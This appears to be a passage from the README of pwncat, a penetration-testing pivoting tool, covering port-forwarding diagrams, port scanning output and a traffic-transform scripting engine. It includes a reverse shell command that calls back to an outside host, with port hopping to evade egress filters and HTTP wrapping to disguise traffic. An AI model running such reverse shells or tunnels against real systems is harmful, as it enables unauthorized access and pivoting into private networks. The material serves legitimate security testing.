INFO: [bind-sock] TCP: TCP_DEFER_ACCEPT: 0
INFO: [bind-sock] TCP: TCP_WINDOW_CLAMP: 0
INFO: [bind-sock] TCP: TCP_INFO: 10
INFO: [bind-sock] TCP: TCP_QUICKACK: 1
INFO: [bind-sock] TCP: TCP_FASTOPEN: 0
Port forwarding magic
Local TCP port forwarding
Scenario
- Alice can be reached from the Outside (TCP/UDP)
- Bob can only be reached from Alice's machine
| |
Outside | DMZ | private subnet
| |
| |
+-----------------+ TCP +-----------------+ TCP +-----------------+
| The cat | -----|----> | Alice | -----|----> | Bob |
| | | | pwncat | | | MySQL |
| 56.0.0.1 | | | 72.0.0.1:3306 | | | 10.0.0.1:3306 |
+-----------------+ | +-----------------+ | +-----------------+
pwncat 72.0.0.1 3306 | pwncat \ |
| -L 72.0.0.1:3306 \ |
| 10.0.0.1 3306 |
Local UDP port forwarding
Scenario
- Alice can be reached from the Outside (but only via UDP)
- Bob can only be reached from Alice's machine
| |
Outside | DMZ | private subnet
| |
| |
+-----------------+ UDP +-----------------+ TCP +-----------------+
| The cat | -----|----> | Alice | -----|----> | Bob |
| | | | pwncat -L | | | MySQL |
| 56.0.0.1 | | | 72.0.0.1:3306 | | | 10.0.0.1:3306 |
+-----------------+ | +-----------------+ | +-----------------+
pwncat -u 72.0.0.1 3306 | pwncat -u \ |
| -L 72.0.0.1:3306 \ |
| 10.0.0.1 3306 |
Remote TCP port forward
Scenario
- Alice cannot be reached from the Outside
- Alice is allowed to connect to the Outside (TCP/UDP)
- Bob can only be reached from Alice's machine
| |
Outside | DMZ | private subnet
| |
| |
+-----------------+ TCP +-----------------+ TCP +-----------------+
| The cat | <----|----- | Alice | -----|----> | Bob |
| | | | pwncat | | | MySQL |
| 56.0.0.1 | | | 72.0.0.1:3306 | | | 10.0.0.1:3306 |
+-----------------+ | +-----------------+ | +-----------------+
pwncat -l 4444 | pwncat --reconn \ |
| -R 56.0.0.1:4444 \ |
| 10.0.0.1 3306 |
Remote UDP port forward
Scenario
- Alice cannot be reached from the Outside
- Alice is allowed to connect to the Outside (UDP: DNS only)
- Bob can only be reached from Alice's machine
| |
Outside | DMZ | private subnet
| |
| |
+-----------------+ UDP +-----------------+ TCP +-----------------+
| The cat | <----|----- | Alice | -----|----> | Bob |
| | | | pwncat | | | MySQL |
| 56.0.0.1 | | | 72.0.0.1:3306 | | | 10.0.0.1:3306 |
+-----------------+ | +-----------------+ | +-----------------+
pwncat -u -l 53 | pwncat -u --reconn \ |
| -R 56.0.0.1:4444 \ |
| 10.0.0.1 3306 |
Outbound port hopping
If you have no idea what outbound ports are allowed from the target machine, you can instruct the client (e.g.: in case of a reverse shell) to probe outbound ports endlessly.
# Reverse shell on target (the client)
# --exec # The command shell the client should provide
# --reconn # Instruct it to reconnect endlessly
# --reconn-wait # Reconnect every 0.1 seconds
# --reconn-robin # Use these ports to probe for outbount connections
pwncat --exec /bin/bash --reconn --reconn-wait 0.1 --reconn-robin 54-1024 10 10.0.0.1 53
Once the client is up and running, either use raw sockets to check for inbound traffic or use something like Wireshark or tcpdump to find out from where the client is able to connect back to you,
If you found one or more ports that the client is able to connect to you, simply start your listener locally and wait for it to come back.
pwncat -l <ip> <port>
If the client connects to you, you will have a working reverse shell. If you stop your local
listening server accidentally or on purpose, the client will probe ports again until it connects successfully.
In order to kill the reverse shell client, you can use --safe-word
(when starting the client).
If none of this succeeds, you can add other measures such as using UDP or even wrapping your packets into higher level protocols, such as HTTP or others. See PSE or examples below for how to transform your traffic.
Pwncat Scripting Engine (PSE)
pwncat
offers a Python based scripting engine to inject your custom code before sending and
after receiving data.
How it works
You will simply need to provide a Python file with the following entrypoint function:
def transform(data, pse):
# Example to reverse a string
return data[::-1]
Both, the function name must be named transform
and the parsed arguments must be named data
and pse
.
Other than that you can add as much code as you like. Each instance of pwncat
can take two scripts:
--script-send
: script will be applied before sending--script-recv
: script will be applied after receiving
See here for API and more details
Example 1: Self-built asymmetric encryption
PSE: asym-enc source code
This will encrypt your traffic asymmetrically. It is just a very basic ROT13 implementation with different shift lengths on both sides to emulate asymmetry. You could do the same and implement GPG based asymmetric encryption for PSE.
# server
pwncat -vvvv -l localhost 4444 \
--script-send pse/asym-enc/pse-asym_enc-server_send.py \
--script-recv pse/asym-enc/pse-asym_enc-server_recv.py
# client
pwncat -vvvv localhost 4444 \
--script-send pse/asym-enc/pse-asym_enc-client_send.py \
--script-recv pse/asym-enc/pse-asym_enc-client_recv.py
Example 2: Self-built HTTP POST wrapper
PSE: http-post source code
This will wrap all traffic into a valid HTTP POST request, making it look like normal HTTP traffic.
# server
pwncat -vvvv -l localhost 4444 \
--script-send pse/http-post/pse-http_post-pack.py \
--script-recv pse/http-post/pse-http_post-unpack.py
# client
pwncat -vvvv localhost 4444 \
--script-send pse/http-post/pse-http_post-pack.py \
--script-recv pse/http-post/pse-http_post-unpack.py
Port scanning
TCP
$ sudo netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:902 0.0.0.0:* LISTEN
tcp6 0 0 ::1:631 :::* LISTEN
tcp6 0 0 ::1:25 :::* LISTEN
tcp6 0 0 ::1:4444 :::* LISTEN
tcp6 0 0 :::1053 :::* LISTEN
tcp6 0 0 :::902 :::* LISTEN
UDP
The following UDP ports are exposing:
$ sudo netstat -ulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address
udp 0 0 0.0.0.0:631 0.0.0.0:*
udp 0 0 0.0.0.0:5353 0.0.0.0:*
udp 0 0 0.0.0.0:39856 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp6 0 0 :::1053 :::*
udp6 0 0 :::5353 :::*
udp6 0 0 :::57728 :::*
nmap
$ time sudo nmap -T5 localhost --version-intensity 0 -p- -sU
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-24 17:03 CEST
Warning: 127.0.0.1 giving up on port because retransmission cap hit (2).
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 65529 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
631/udp open|filtered ipp
1053/udp open|filtered remote-as
5353/udp open|filtered zeroconf
39856/udp open|filtered unknown
40488/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 179.15 seconds
real 2m52.446s
user 0m0.844s
sys 0m2.571s
netcat
$ time nc -z localhost 1-65535 -u -4 -v
Connection to localhost 68 port [udp/bootpc] succeeded!
Connection to localhost 631 port [udp/ipp] succeeded!
Connection to localhost 1053 port [udp/*] succeeded!
Connection to localhost 5353 port [udp/mdns] succeeded!
Connection to localhost 39856 port [udp/*] succeeded!
real 0m18.734s
user 0m1.004s
sys 0m2.634s
pwncat
$ time pwncat -z localhost 1-65535 -u -4
Scanning 65535 ports
[+] 68/UDP open (IPv4)
[+] 631/UDP open (IPv4)
[+] 1053/UDP open (IPv4)
[+] 5353/UDP open (IPv4)
[+] 39856/UDP open (IPv4)
real 0m7.309s
user 0m6.465s
sys 0m4.794s
:information_source: FAQ
Q: Is pwncat
compatible with netcat
?
A: Yes, it is fully compatible in the way it behaves in connect, listen and zero-i/o mode.
You can even mix pwncat
with netcat
, ncat
or similar tools.
Q: Does it work on X?
A: In its current state it works with Python 2, 3 pypy2 and pypy3 and is fully tested on Linux and MacOS. Windows support is available, but is considered experimental (see integration tests).
Q: I found a bug / I have to suggest a new feature! What can I do?
A: For bug reports or enhancements, please open an issue here.
Q: How can I support this project?
A: Thanks for asking! First of all, star this project to give me some feedback and see CONTRIBUTING.md for details.
:sunrise: Artwork
Type | Artist | Image | License |
---|---|---|---|
Logo | maifz | ||
Banner 1 | maifz | ||
Banner 2 | maifz |
:lock: cytopia sec tools
Below is a list of sec tools and docs I am maintaining.
Name | Category | Language | Description |
---|---|---|---|
offsec | Documentation | Markdown | Offsec checklist, tools and examples |
header-fuzz | Enumeration | Bash | Fuzz HTTP headers |
smtp-user-enum | Enumeration | Python 2+3 | SMTP users enumerator |
urlbuster | Enumeration | Python 2+3 | Mutable web directory fuzzer |
pwncat | Pivoting | Python 2+3 | Cross-platform netcat on steroids |
badchars | Reverse Engineering | Python 2+3 | Badchar generator |
fuzza | Reverse Engineering | Python 2+3 | TCP fuzzing tool |
:octocat: Contributing
See Contributing guidelines to help to improve this project.
:exclamation: Disclaimer
This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.
:page_facing_up: License
Copyright (c) 2020 cytopia
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